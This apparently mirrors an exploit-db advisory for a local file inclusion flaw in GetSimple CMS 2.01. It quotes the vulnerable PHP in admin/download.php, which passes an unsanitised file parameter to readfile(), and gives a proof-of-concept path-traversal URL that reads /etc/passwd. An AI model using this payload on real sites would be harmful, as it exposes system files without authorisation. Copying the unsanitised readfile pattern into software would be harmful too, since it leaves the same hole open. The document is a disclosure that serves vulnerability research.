Getsimple CMS 2.01 – Local File Inclusion

  • 作者: Batch
    日期: 2010-05-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12517/
  • # Exploit Title: GetSimple 2.01 LFI
    # Date: 4/5/2010
    # Author: Batch
    # Software Link: http://www.box.net/get-simple
    # Version: 2.01
    
    #Special Conditions: Must be admin.
    # Code :
    
    ...
    
    # get file
    if (file_exists($_GET['file'])) {
    readfile($_GET['file'], 'r');
    }
    exit;
    
    ...
    
    
    http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd
    
    #-Batch
    
    #ryan1918.com
    #Everyone else.